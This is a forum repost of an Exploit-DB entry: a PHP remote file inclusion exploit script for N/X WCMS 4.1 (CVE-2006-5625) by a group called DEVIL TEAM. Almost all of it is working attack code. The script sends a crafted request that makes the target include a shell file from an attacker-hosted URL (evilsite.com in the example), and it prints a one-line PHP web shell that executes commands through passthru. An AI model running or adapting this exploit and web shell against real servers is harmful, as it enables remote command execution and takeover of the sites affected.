Exploit N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2659
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5625
Дата публикации
2006-10-27
PHP:
#!/usr/bin/php -q -d short_open_tag=on
<?
print '
    |                 \\\\
    |                  \\\
    |________   __________\____   ____.___ .____     
    |\______ \  \_   _____/\   \ /   /|   ||    |    
    | |    |  \  |    __)_  \   Y   / |   ||    |    
      |    `   \ |        \  \     /  |   ||    |___ 
    |/_______  //_______  /   \___/   |___||_______ \
    |        \/         \/    \\                   \/
     ______________________   _\\__      _____   
    |\__    ___/\_   _____/  /  _  \    /     \  
    |  |    |    |    __)_  /  /_\  \  /  \ /  \ 
    |  |    |    |        \/    |    \/    Y    \
       |____|   /_______  /\____|__  /\____|__  /
<---|--|----------------\/---------\/---------\/----/>
    |  |                            \\\
    |  | | | | |                     \\ //----------------------->
    | DEVIL TEAM - POLISH TEAM        \\\/ http://www.rahim.webd.pl/
___________              .__         ._\_ __    .__        _____       
\_   _____/__  _________ |  |   ____ |__|/  |_  |__| _____/ ____\____  
 |    __)_\  \/  /\____ \|  |  /  _ \|  \   __\ |  |/    \   __\/  _ \ 
 |        \>    < |  |_> >  |_(  <_> )  ||  |   |  |   |  \  | (  <_> )
/_______  /__/\_ \|   __/|____/\____/|__||__|   |__|___|  /__|  \____/ 
<-------\/------\/|__|-----------------------\----------\/------------->
    | | | | |                                 \\

    | N/X 2002 Professional Edition Web CMS <= 4.1 (nxheader.inc.php) Remote File Include Exploit
    |  - ------------------------------------------------------------ -

    |   Script name ....: N/X WCMS 4.1         Release Date ..: 2006/10/27
    |   Script site ....: http://www.nxsystems.org/en/developers/downloads/
    |   Find by ....: Kacper (a.k.a Rahim)

    |   (c)od3d by Kacper
	|   Autor Site: http://www.rahim.webd.pl/
	|   Contact: [email protected]
	|   DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
<----------------------------------------------------------------------/>
    |
    | Greetings DragonHeart and all DEVIL TEAM Patriots :)
    |   | Leito - Leon - TomZen - Gelo - Ramzes - DMX - Ci2u - Larry
    |   |   | @steriod - Drzewko - CrazzyIwan - ARCLITE - Rammstein - Adam
	|   |   |   | Kicaj - DeathSpeed - Arkadius - Michas - pepi - nukedclx
    |   |   | SkD - MXZ - sysios - mIvus - wacky
<---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---/> 
';

if ($argc<4) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell cmd OPTIONS
host:      script server (ip/hostname)
shell:     path to shell
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.evilsite.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland!!..Hauru..^_^..the..best..polish..team..Greetz";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$cmd="";

$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if ($proxy=='') {$p='http://'.$host.':'.$port;}

$packet ="GET ".$p."wwwdev/nxheader.inc.php?c[path]=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpackets($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";
?>

# milw0rm.com [2006-10-27]
 
Источник
www.exploit-db.com

Похожие темы